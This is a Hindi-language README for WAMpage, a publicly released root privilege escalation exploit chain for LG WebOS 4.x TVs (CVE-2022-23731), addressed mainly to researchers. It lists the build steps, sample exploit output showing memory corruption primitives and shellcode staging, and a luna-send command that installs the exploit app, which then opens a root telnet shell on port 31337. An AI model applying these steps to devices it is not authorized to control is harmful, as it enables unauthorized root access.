
WAMpage - WebOS रूट LPE एक्सप्लॉइट श्रृंखला (CVE-2022-23731)
WAMpage - WebOS रूट LPE एक्सप्लॉइट श्रृंखला (CVE-2022-23731)
यह एक्सप्लॉइट मुख्य रूप से अन्य शोधकर्ताओं के लिए रुचिकर है - यदि आप सिर्फ अपने TV को रूट करना चाहते हैं, तो संभवतः आप RootMyTV चाहते हैं, जो एक विश्वसनीय 1-क्लिक स्थायी रूट प्रदान करता है।
वर्तमान में केवल 32-बिट SoCs पर WebOS 4.x का समर्थन करता है। यह सॉफ़्टवेयर AS IS प्रदान किया गया है, अपने जोखिम पर उपयोग करें, आदि आदि।
Writeup: https://www.da.vidbuchanan.co.uk/blog/webos-wampage.html

आवश्यक शर्तें:
apt install qemu-user
npm install -g @webosose/ares-cli
संकलन:
make
make test एक्सप्लॉइट को d8 में बनाकर चलाएगा, जो qemu-arm में चल रहा है। (d8 का एक पूर्व-संकलित संस्करण और इसकी निर्भरताएँ bin/ निर्देशिका में शामिल हैं)। यदि एक्सप्लॉइट सफलतापूर्वक काम करता है, तो आपको संभवतः कुछ ऐसा मिलेगा:
[+] Starting WAMpage...
[+] addrof(myobj) = 0x5a68f5d1
[+] Test: reconstructed myobj: {"foo":"bar"}
[+] Set up arbread32/arbwrite32.
[+] stage2 shellcode loaded @ 0xff458000
[+] myfunc @ 0x5a693369
[+] stage1 RWX buf @ 0x5bb8f280
[+] Copied stage1 shellcode. Calling...
Traceback (most recent call last):
File "<stdin>", line 25, in <module>
IOError: [Errno 13] Permission denied: '/dev/mem'
अनुमति त्रुटि अपेक्षित है, यह मानते हुए कि आपकी मशीन पूरी तरह से गलत कॉन्फ़िगर नहीं है।
आप devmemes.py एक्सप्लॉइट को सीधे TV पर चलाकर परीक्षण कर सकते हैं, लेकिन आपको शुरू में रूट की आवश्यकता होगी, या किसी अन्य प्रकार का unsandboxed/unjailed शेल चाहिए।
आप ares-install का उपयोग कर सकते हैं, या मैन्युअल रूप से IPK को कॉपी करें और इसे devmode शेल से चलाएँ:
luna-send-pub -i 'luna://com.webos.appInstallService/dev/install' '{"id":"tv.rootmy.wampage","ipkUrl":"/path/to/wampage.ipk","subscribe":true}'
ऐप लॉन्च करें और "Start Exploit" बटन दबाएँ। यदि सब कुछ ठीक रहा, तो पोर्ट 31337 पर एक telnet सर्वर खुल जाना चाहिए।